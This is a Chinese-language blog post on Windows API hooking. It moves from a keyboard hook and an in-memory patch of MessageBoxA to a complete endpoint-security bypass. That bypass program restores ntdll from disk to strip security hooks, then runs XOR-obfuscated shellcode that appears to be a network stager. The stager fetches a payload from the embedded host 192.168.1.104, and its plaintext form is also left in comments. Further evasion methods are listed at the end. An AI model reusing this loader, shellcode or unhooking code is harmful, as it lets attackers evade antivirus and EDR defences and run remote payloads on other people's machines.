Windows API hook技术

Windows API hook技术

A.什么叫挂钩?

钩子技术即指“给特定的函数挂上钩子,让函数在执行前先执行被挂的钩子”,从而达到拦截事件和函数调用的目的。挂钩子的本质是一个程序段。

为了方便理解我们先首先实现一个简单的keyborad挂钩

hookDLL.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <string>
#include <Windows.h>
#include <iostream>
#include <fstream>
using namespace std;
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam) {
    ofstream text;
    text.open("c:\\programdata\\hook.txt");
    text << "HOOK";
    text.close();
    return CallNextHookEx(NULL, code, wParam, lParam);
}

  hookexe.cpp

// installhook.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include <iostream>

#include <windows.h>
#include <strsafe.h>

int main()
{
    HOOKPROC keybords;
    static HINSTANCE hookdll;
    hookdll = LoadLibrary(TEXT("C:\\Users\\localhost\\Desktop\\hook\\keyboradProcHook\\x64\\Release\\keyboradProcHook.dll"));
    keybords = (HOOKPROC)GetProcAddress(hookdll, "KeyboardProc");
    static HHOOK hhook;
    hhook = SetWindowsHookEx(
        WH_KEYBOARD_LL,
        keybords,
        hookdll,
        0);
    std::cout << "Hello World!\n";
    
}

B通过HookedMessageBox 进一步了解hook技术

这里是https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++源代码

#include "pch.h"
#include <iostream>
#include <Windows.h>

FARPROC messageBoxAddress = NULL;
SIZE_T bytesWritten = 0;
char messageBoxOriginalBytes[6] = {};

int __stdcall HookedMessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) {

	// print intercepted values from the MessageBoxA function
	std::cout << "Ohai from the hooked function\n";
	std::cout << "Text: " << (LPCSTR)lpText << "\nCaption: " << (LPCSTR)lpCaption << std::endl;

	// unpatch MessageBoxA
	WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, messageBoxOriginalBytes, sizeof(messageBoxOriginalBytes), &bytesWritten);

	// call the original MessageBoxA
	return MessageBoxA(NULL, lpText, lpCaption, uType);
}

int main()
{
	// show messagebox before hooking
	MessageBoxA(NULL, "hi", "hi", MB_OK);

	HINSTANCE library = LoadLibraryA("user32.dll");
	SIZE_T bytesRead = 0;

	// get address of the MessageBox function in memory
	messageBoxAddress = GetProcAddress(library, "MessageBoxA");

	// save the first 6 bytes of the original MessageBoxA function - will need for unhooking
	ReadProcessMemory(GetCurrentProcess(), messageBoxAddress, messageBoxOriginalBytes, 6, &bytesRead);

	// create a patch "push <address of new MessageBoxA); ret"
	void* hookedMessageBoxAddress = &HookedMessageBox;
	char patch[6] = { 0 };
	memcpy_s(patch, 1, "\x68", 1);
	memcpy_s(patch + 1, 4, &hookedMessageBoxAddress, 4);
	memcpy_s(patch + 5, 1, "\xC3", 1);

	// patch the MessageBoxA
	WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, patch, sizeof(patch), &bytesWritten);

	// show messagebox after hooking
	MessageBoxA(NULL, "hi", "hi", MB_OK);

	return 0;
}

  通过disam反汇编发现,确实再第二次调用MessgeboxA的时候执行了我们的函数

 

 

 

我们尝试分析hook过程

messgbox函数存在于用户层user32.dll中,所以我们先从user32.dll中找到MessgboxA的地址

 

 

 然后读取当前进程的内存空间中的MessgeBoxA的地址的前6位字节用来后面unhook的时候使用

 

 

 然后就是存放修改自身内存的指令

push ret

 

 

 然后就是修改内存空间,

 

 

 这是修改后的messgbox

 

 

 

 

 

 进入HookedMessageBox后

 

 

 

 

 

 

 C通过杀软特性实战bypass EDR

一般来说ntdll就是连接用户与内核层的最后一道防线,很多杀软在进行拦截是都是hook ntdll里面的一些函数,讨论的情况是如何bypass他

一幅图简单明了

 

 

 前提是ntdll已经被hook了 当然如果没hook最好(:

#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>
#include <stdio.h>
/* length: 798 bytes */
//unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78";
unsigned char buf[] = "\xfd\xe9\x88\x1\x1\x1\x61\x88\xe4\x30\xd3\x65\x8a\x53\x31\x8a\x53\xd\x8a\x53\x15\x8a\x73\x29\xe\xb6\x4b\x27\x30\xfe\x30\xc1\xad\x3d\x60\x7d\x3\x2d\x21\xc0\xce\xc\x0\xc6\xe3\xf1\x53\x56\x8a\x53\x11\x8a\x43\x3d\x0\xd1\x8a\x41\x79\x84\xc1\x75\x4b\x0\xd1\x51\x8a\x49\x19\x8a\x59\x21\x0\xd2\xe2\x3d\x48\x8a\x35\x8a\x0\xd7\x30\xfe\x30\xc1\xad\xc0\xce\xc\x0\xc6\x39\xe1\x74\xf5\x2\x7c\xf9\x3a\x7c\x25\x74\xe3\x59\x8a\x59\x25\x0\xd2\x67\x8a\xd\x4a\x8a\x59\x1d\x0\xd2\x8a\x5\x8a\x0\xd1\x88\x45\x25\x25\x5a\x5a\x60\x58\x5b\x50\xfe\xe1\x59\x5e\x5b\x8a\x13\xea\x87\x5c\x69\x6f\x64\x75\x1\x69\x76\x68\x6f\x68\x55\x69\x4d\x76\x27\x6\xfe\xd4\x30\xfe\x56\x56\x56\x56\x56\x69\x3b\x57\x78\xa6\xfe\xd4\xe8\x85\x1\x1\x1\x5a\x30\xc8\x50\x50\x6b\x2\x50\x50\x69\x51\x1\x1\x1\x52\x51\x69\x56\x88\x9e\xc7\xfe\xd4\xea\x71\x5a\x30\xd3\x53\x69\x1\x3\x41\x85\x53\x53\x53\x52\x53\x51\x69\xea\x54\x2f\x3a\xfe\xd4\x88\xc7\x82\xc2\x51\x30\xfe\x56\x56\x6b\xfe\x52\x57\x69\x2c\x7\x19\x7a\xfe\xd4\x84\xc1\xe\x85\xc2\x0\x1\x1\x30\xfe\x84\xf7\x75\x5\x88\xf8\xea\x8\x69\xab\xc4\xe3\x5c\xfe\xd4\x88\xc0\x69\x44\x20\x5f\x30\xfe\xd4\x30\xfe\x56\x6b\x6\x50\x57\x51\x69\xb6\x56\xe1\xa\xfe\xd4\xbe\x1\x2e\x1\x1\x38\xc6\x75\xb6\x30\xfe\xe8\x90\x0\x1\x1\xe8\xc8\x0\x1\x1\xe9\x8a\xfe\xfe\xfe\x2e\x65\x42\x51\x64\x1\xb2\x9c\xe6\x19\xb4\x91\xc2\xb5\xcd\x2e\x69\xe0\x59\xff\x31\x34\x41\x11\x33\x29\xbf\x57\x97\x5\x33\x45\x36\xdd\x84\x9a\xb5\x58\xc0\xbb\xcf\xfb\x14\xd9\x12\xe2\x17\x95\xfc\x6b\xe1\x81\xc1\xc9\x10\xbe\x80\x91\x67\xe7\xea\xa7\x4e\x94\x8\xb5\x6c\x27\x18\x68\xcb\xc0\xe9\x7d\x89\xf4\x3e\xda\x39\x1\x54\x72\x64\x73\x2c\x40\x66\x64\x6f\x75\x3b\x21\x4c\x6e\x7b\x68\x6d\x6d\x60\x2e\x34\x2f\x31\x21\x29\x62\x6e\x6c\x71\x60\x75\x68\x63\x6d\x64\x3a\x21\x4c\x52\x48\x44\x21\x38\x2f\x31\x3a\x21\x56\x68\x6f\x65\x6e\x76\x72\x21\x4f\x55\x21\x37\x2f\x30\x3a\x21\x56\x4e\x56\x37\x35\x3a\x21\x55\x73\x68\x65\x64\x6f\x75\x2e\x34\x2f\x31\x3a\x21\x43\x4e\x48\x44\x38\x3a\x44\x4f\x54\x52\x28\xc\xb\x1\x27\xa5\xe\x77\x5d\xbf\xd5\x23\xda\x5c\xbe\xb1\x4\x19\xd1\x95\x42\xc6\xcf\x5e\x81\x95\x69\xb4\x46\xc3\xde\x28\xe4\x2d\x72\xb7\xfa\x85\x7c\x41\xdc\xac\xe\xc3\x71\x9b\x6f\xa5\xde\x65\x2e\xa0\x34\xfb\xca\x53\xb0\x87\x81\x8a\x52\x64\xff\x77\x9a\x1c\xf2\x34\xf4\xe9\xfd\xf3\xda\x9a\xf2\x8\x3d\x6f\x24\xd1\x5b\x2d\x9a\xe2\xf3\xb\x5b\xe5\x0\xad\xbd\x3a\x8a\xbc\x28\x5f\xf0\x4c\xf2\x13\xc\x4f\x3b\xaa\x2e\x1d\x97\x4\x78\x39\x1e\x7f\x96\x9\x14\xe4\x14\xfc\x25\x0\x32\x4c\x4e\x38\x22\x9\x45\xcf\x92\x28\x9a\xa4\xef\x25\xb6\xe8\x2d\x8c\xa9\xd3\xa6\x2d\x88\x85\xb\xd4\xca\xcd\x26\xb\x34\xaf\x5d\x47\xe1\xbb\x52\x2f\x82\xfc\xdb\xfd\xfd\xa9\xd6\xda\x71\x9f\xdf\xab\xec\x60\x6b\x7b\xd4\xde\xf4\x7\x9e\xf4\x2e\x10\x56\x6f\xa6\x62\x2f\x36\x52\x31\x97\xd4\xca\xbb\x61\x84\x26\x64\x2d\x78\xa2\x36\x4e\xae\x66\x14\xe\x90\xab\x7b\x1\x69\xf1\xb4\xa3\x57\xfe\xd4\x6b\x41\x69\x1\x11\x1\x1\x69\x1\x1\x41\x1\x56\x69\x59\xa5\x52\xe4\xfe\xd4\x92\xb8\x1\x1\x1\x1\x0\xd8\x50\x52\x88\xe6\x56\x69\x1\x21\x1\x1\x52\x57\x69\x13\x97\x88\xe3\xfe\xd4\x84\xc1\x75\xc7\x8a\x6\x0\xc2\x84\xc1\x74\xe4\x59\xc2\xe9\xa8\xfc\xfe\xfe\x30\x38\x33\x2f\x30\x37\x39\x2f\x30\x2f\x30\x31\x35\x1\x13\x35\x57\x79";
void unhook() {
	HANDLE process = GetCurrentProcess();
	MODULEINFO mi = {};
	HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");

	GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
	LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
	HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
	LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

	PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

	for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
		PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

		if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
			DWORD oldProtection = 0;
			bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
			memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
			isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
		}
	}

	CloseHandle(process);
	CloseHandle(ntdllFile);
	CloseHandle(ntdllMapping);
	FreeLibrary(ntdllModule);

}
int main()
{
	unhook();
		int password = 1025;
	unsigned char deShellCode[1000];
	int nLen = sizeof(buf) - 1;
		for (int i = 0; i < nLen; i++)
	{
		deShellCode[i] = buf[i] ^ password;
		printf("\\x%x", deShellCode[i]);
	}

	HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
	LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(deShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	unhook();
	RtlMoveMemory(shellcodeAddress, deShellCode, sizeof(deShellCode));

	PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);
	SetThreadpoolWait(threadPoolWait, event, NULL);
	WaitForSingleObject(event, INFINITE);

	return 0;
}
//#include <stdio.h>
//#include <Windows.h>
//
///* length: 798 bytes */
//unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78";
//
//
//int main(int argc, char* argv[])
//{
//	int password = 1025;
//	unsigned char enShellCode[1000];
//	unsigned char deShellCode[1000];
//	int nLen = sizeof(buf) - 1;
//
//	for (int i = 0; i < nLen; i++)
//	{
//		enShellCode[i] = buf[i] ^ password;
//		printf("\\x%x", enShellCode[i]);
//	}
//
//	printf("\n");
//
//	/*for (int i = 0; i < nLen; i++)
//	{
//		deShellCode[i] = enShellCode[i] ^ password;
//		printf("\\x%x", deShellCode[i]);
//	}*/
//
//	system("pause");
//	return 0;
//}

D总结

当然 这次这是提到了一种unhook的手法,还有很多种比如 https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher以及ACGhttps://www.countercraftsec.com/blog/post/arbitrary-vs-kernel/

也可以直接调用syscall来不与api交互,当然这些都是玩烂了的手法。只是体力活而已

参考

https://xz.aliyun.com/t/9166#toc-5
https://www.cnblogs.com/LyShark/p/13033722.html
https://improsec.com/tech-blog/user-mode-api-hooks-and-bypasses
https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait
https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
https://www.ired.team/offensive-security/defense-evasion/acg-arbitrary-code-guard-processdynamiccodepolicy
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://www.ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis

 

posted @ 2021-05-23 20:42  yourse1f  阅读(754)  评论(0编辑  收藏  举报